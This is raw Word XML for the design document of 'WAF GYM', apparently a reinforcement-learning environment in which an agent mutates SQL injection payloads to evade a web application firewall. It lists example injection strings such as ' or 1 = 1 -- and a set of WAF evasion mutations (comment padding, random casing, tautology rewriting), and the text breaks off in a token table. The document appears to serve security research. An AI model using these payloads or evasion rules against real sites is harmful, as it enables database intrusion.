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9DA6" w14:textId="29EE78A8" w:rsidR="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00BB099F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>WAF GYM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277AB7EB" w14:textId="36C954F1" w:rsidR="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00BB099F"/>
    <w:p w14:paraId="64CC6AE7" w14:textId="77777777" w:rsidR="000573A2" w:rsidRPr="00BB099F" w:rsidRDefault="000573A2" w:rsidP="00BB099F"/>
    <w:p w14:paraId="4FA6269B" w14:textId="700D5C68" w:rsidR="00BB099F" w:rsidRDefault="000573A2" w:rsidP="000573A2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Waf Gym environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9EF58C" w14:textId="77777777" w:rsidR="000573A2" w:rsidRPr="000573A2" w:rsidRDefault="000573A2" w:rsidP="000573A2"/>
    <w:p w14:paraId="74AD134F" w14:textId="6963185D" w:rsidR="00856442" w:rsidRDefault="00856442">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7867063D" wp14:editId="0D99D948">
            <wp:extent cx="5731510" cy="3889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D976" w14:textId="5181028A" w:rsidR="00856442" w:rsidRDefault="00856442">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4B40FF" w14:textId="73E2AEA6" w:rsidR="004D625A" w:rsidRDefault="004D625A" w:rsidP="004D625A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A530114" w14:textId="23BE7D4D" w:rsidR="004D625A" w:rsidRDefault="004D625A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F26AFA" w14:textId="57BB7970" w:rsidR="00497FAE" w:rsidRDefault="00F16AC2">
      <w:r w:rsidRPr="00F16AC2">
        <w:t>Payload is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497FAE">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:r w:rsidR="00497FAE">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="006277E8">
        <w:t xml:space="preserve"> injection </w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r w:rsidR="006277E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497FAE">
        <w:t xml:space="preserve">that is mutated by the agent until it passes WAF check. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04839765" w14:textId="77777777" w:rsidR="00497FAE" w:rsidRDefault="00497FAE">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD9BD00" w14:textId="252B2DAA" w:rsidR="00F16AC2" w:rsidRPr="00497FAE" w:rsidRDefault="00497FAE">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497FAE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
      <w:r w:rsidR="006277E8" w:rsidRPr="00497FAE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16AC2" w:rsidRPr="00497FAE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D27A5A" w14:textId="77777777" w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>' or 1 = 1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913B181" w14:textId="532B0AB3" w:rsidR="004D625A" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidR="00285568" w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>union (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> select @@version )  --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161E4EB7" w14:textId="77777777" w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F85DA3" w14:textId="2ECAAAF2" w:rsidR="00DF2DA0" w:rsidRPr="00C16477" w:rsidRDefault="00C16477" w:rsidP="00134642">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C16477">
        <w:lastRenderedPageBreak/>
        <w:t>Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E74A56" w14:textId="77777777" w:rsidR="00134642" w:rsidRDefault="00134642"/>
    <w:p w14:paraId="05B079DC" w14:textId="792EFD89" w:rsidR="00C16477" w:rsidRDefault="00C16477">
      <w:r>
        <w:t xml:space="preserve">Action Space =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00134642" w:rsidRPr="00856442">
        <w:t>gym.spaces.</w:t>
      </w:r>
      <w:r>
        <w:t>Discreet(9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740484AC" w14:textId="77777777" w:rsidR="00C16477" w:rsidRDefault="00C16477"/>
    <w:p w14:paraId="78B0FF78" w14:textId="68F8AFA5" w:rsidR="00C16477" w:rsidRDefault="00C16477">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077411F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mutation rule set</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="9648" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr w:rsidR="0027551D" w14:paraId="4BF6E478" w14:textId="77777777" w:rsidTr="00275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3FB1B241" w14:textId="7065C20D" w:rsidR="0027551D" w:rsidRPr="00C16477" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Mutation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F103611" w14:textId="1AAAD511" w:rsidR="0027551D" w:rsidRDefault="00275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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="1DED10B8" w14:textId="77777777" w:rsidTr="0027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15042AC3" w14:textId="2EFEED5C" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>spaces_to_comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BE93D99" w14:textId="76E001DE" w:rsidR="0027551D" w:rsidRDefault="0027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i/>
                <w:iCs/>
              </w:rPr>
              <w:t>“ “ =&gt; “/**/”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="4E21551A" w14:textId="77777777" w:rsidTr="0027551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2AA7192B" w14:textId="01679EB9" w:rsidR="0027551D" w:rsidRPr="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>random_case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="677D548B" w14:textId="763845BA" w:rsidR="0027551D" w:rsidRDefault="0027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i/>
                <w:iCs/>
              </w:rPr>
              <w:t>SELECT =&gt; SeLeCT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="4B59C570" w14:textId="77777777" w:rsidTr="0027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6FCAA2E7" w14:textId="20283FE2" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>swap_keywords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD87DAA" w14:textId="6D439C7E" w:rsidR="0027551D" w:rsidRDefault="0027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i/>
                <w:iCs/>
              </w:rPr>
              <w:t>|| =&gt; OR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="0D8D6A85" w14:textId="77777777" w:rsidTr="0027551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4DF83BFE" w14:textId="1A2733E2" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>swap_int_repr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="199EAC81" w14:textId="77777777" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027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 =&gt; 0x1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4722651A" w14:textId="51CCDB18" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027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i/>
                <w:iCs/>
              </w:rPr>
              <w:t>1 =&gt; Select 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="13E0556A" w14:textId="77777777" w:rsidTr="0027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053C1C27" w14:textId="3F5D8324" w:rsidR="0027551D" w:rsidRPr="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>spaces_to_whitespaces_alternatives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="017611AC" w14:textId="77777777" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027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171F5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>\t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> =&gt; \n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E10C19B" w14:textId="41429079" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027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i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> “ “ =&gt; \t</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="54D3ED5F" w14:textId="77777777" w:rsidTr="0027551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203991F6" w14:textId="05A90C1E" w:rsidR="0027551D" w:rsidRPr="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>comment_rewriting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="512DC927" w14:textId="77777777" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027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SELECT 1 -- =&gt; SELECT 1 – bu</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA144A9" w14:textId="60A92E9D" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027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i/>
                <w:iCs/>
              </w:rPr>
              <w:t>SELECT 1 /**/ =&gt; SELECT 1 /*bu*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="110642A0" w14:textId="77777777" w:rsidTr="0027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61463784" w14:textId="7B70610B" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>change_tautologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="279A0C46" w14:textId="77777777" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027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1=1 =&gt; 1 LIKE 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCCB345" w14:textId="20E4575A" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027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i/>
                <w:iCs/>
              </w:rPr>
              <w:t>1=1=&gt; 1 != 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="52D26020" w14:textId="77777777" w:rsidTr="002755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38369E76" w14:textId="0FC9B172" w:rsidR="0027551D" w:rsidRPr="0027551D" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>logical_invariant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2269E066" w14:textId="401DB672" w:rsidR="0027551D" w:rsidRDefault="0027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i/>
                <w:iCs/>
              </w:rPr>
              <w:t>or 1=1# =&gt; or 1=1 AND 1#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027551D" w14:paraId="4F10FA07" w14:textId="77777777" w:rsidTr="0027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4" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="096BFB47" w14:textId="71D990F3" w:rsidR="0027551D" w:rsidRPr="00C16477" w:rsidRDefault="0027551D" w:rsidP="0027551D">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16477">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>reset_inline_comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4824" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E9396E8" w14:textId="43CE7F91" w:rsidR="0027551D" w:rsidRDefault="0027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select /*test*/ =&gt; select /**/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27772B47" w14:textId="77777777" w:rsidR="0027551D" w:rsidRPr="0077411F" w:rsidRDefault="0027551D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDBA8BA" w14:textId="4B5B6B11" w:rsidR="0027551D" w:rsidRDefault="0027551D" w:rsidP="00C16477">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D275880" w14:textId="1D05DAC3" w:rsidR="00856442" w:rsidRDefault="00856442" w:rsidP="00134642">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00856442">
        <w:t>State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A62A9C" w14:textId="77777777" w:rsidR="00134642" w:rsidRPr="00134642" w:rsidRDefault="00134642" w:rsidP="00134642"/>
    <w:p w14:paraId="649838CB" w14:textId="69097EAC" w:rsidR="00552EA2" w:rsidRDefault="00856442" w:rsidP="00C16477">
      <w:r w:rsidRPr="00856442">
        <w:t>gym.spaces.Box(low=0., high=1., shape=</w:t>
      </w:r>
      <w:r>
        <w:t>(957,)</w:t>
      </w:r>
      <w:r w:rsidR="00552EA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00856442">
        <w:t>, dtype=np.float32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D86EB" w14:textId="401E2780" w:rsidR="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00C16477">
      <w:r>
        <w:t>tokens -&gt; 702</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE1DAF" w14:textId="457E8A08" w:rsidR="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00C16477">
      <w:r>
        <w:t>characters -&gt; 255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22822143" w14:textId="258E062A" w:rsidR="00BB099F" w:rsidRDefault="000573A2" w:rsidP="00C16477">
      <w:r w:rsidRPr="00552EA2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548F30DB" wp14:editId="145212DC">
            <wp:extent cx="5084794" cy="558862"/>
            <wp:effectExtent l="190500" t="190500" r="192405" b="184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794" cy="5588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45366D" w14:textId="77777777" w:rsidR="000573A2" w:rsidRDefault="000573A2" w:rsidP="00BB099F"/>
    <w:p w14:paraId="0155EA56" w14:textId="2BAA3879" w:rsidR="007A75A2" w:rsidRDefault="007A75A2" w:rsidP="00BB099F">
      <w:r>
        <w:t>The state is ‘calculated’ and provided by the Waf-gym after every action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674FD4C" w14:textId="19C9BD56" w:rsidR="00BB099F" w:rsidRDefault="007A75A2" w:rsidP="00DD30E9">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The gym first </w:t>
      </w:r>
      <w:r w:rsidR="000573A2">
        <w:t xml:space="preserve">tokenizes the payload (using the mapping defined in the table below). </w:t>
      </w:r>
      <w:r>
        <w:t>After the payload is tokenized, t</w:t>
      </w:r>
      <w:r w:rsidR="00BB099F">
        <w:t xml:space="preserve">he state is created by concatenating histogram of tokens with the histogram of characters in the (mutated) payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BB58E1" w14:textId="40E9DC0E" w:rsidR="00DD30E9" w:rsidRPr="00BB099F" w:rsidRDefault="00DD30E9" w:rsidP="00DD30E9">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB099F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TOKENS</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="9182" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB099F" w:rsidRPr="00BB099F" w14:paraId="4D866450" w14:textId="77777777" w:rsidTr="00057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376C58EC" w14:textId="4566FFF7" w:rsidR="00BB099F" w:rsidRPr="00027FC0" w:rsidRDefault="00BB099F" w:rsidP="00DD30E9">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Token type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="529C3411" w14:textId="298543A1" w:rsidR="00BB099F" w:rsidRDefault="00BB099F" w:rsidP="00027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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027FC0" w:rsidRPr="00BB099F" w14:paraId="12028B60" w14:textId="77777777" w:rsidTr="0005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79325D9B" w14:textId="4FB76B0C" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00027FC0" w:rsidP="00DD30E9">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00027FC0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>SYMBOLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="161F3813" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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ALL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46B6FB88" w14:textId="2B948C40" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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ALTER</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74DC7272" w14:textId="7CD52CDE" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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SELECT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="481F866F" w14:textId="192734A4" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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…..</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C3E02EA" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00027FC0" w:rsidP="00DD3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027FC0" w:rsidRPr="00BB099F" w14:paraId="6A8476E5" w14:textId="77777777" w:rsidTr="000573A2">
        <w:trPr>
          <w:trHeight w:val="1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06A9967A" w14:textId="3F5A053F" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00027FC0" w:rsidP="00DD30E9">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00027FC0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>SQL_FUNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52AC392C" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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MAX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="341A22DA" w14:textId="396A5524" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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SUM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69B7E52D" w14:textId="3F511BCC" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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TRIM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EDFE356" w14:textId="25A43328" w:rsidR="00027FC0" w:rsidRPr="00DD30E9" w:rsidRDefault="00027FC0" w:rsidP="00027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….</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32FE8D6E" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00027FC0" w:rsidP="00DD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027FC0" w:rsidRPr="00BB099F" w14:paraId="2D333D13" w14:textId="77777777" w:rsidTr="0005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76D22965" w14:textId="08AE4393" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00027FC0" w:rsidP="00DD30E9">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD30E9">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>PUNCTATION_SUB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18273E0C" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRPr="00DD30E9" w:rsidRDefault="00027FC0" w:rsidP="00027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3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"||"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> =&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> "OR"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34840E61" w14:textId="341C083F" w:rsidR="00027FC0" w:rsidRPr="00DD30E9" w:rsidRDefault="00027FC0" w:rsidP="00027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3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>":"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> =&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"COLON"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="778B11B5" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00027FC0" w:rsidP="00DD3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027FC0" w:rsidRPr="00BB099F" w14:paraId="6950234A" w14:textId="77777777" w:rsidTr="000573A2">
        <w:trPr>
          <w:trHeight w:val="10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21BAC02C" w14:textId="35CBF3A0" w:rsidR="00027FC0" w:rsidRPr="00BB099F" w:rsidRDefault="00027FC0" w:rsidP="00DD30E9">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD30E9">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>SYS_DEF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="230EB12C" w14:textId="77777777" w:rsidR="00027FC0" w:rsidRDefault="00027FC0" w:rsidP="00027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3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>MYSQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> =&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3A23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
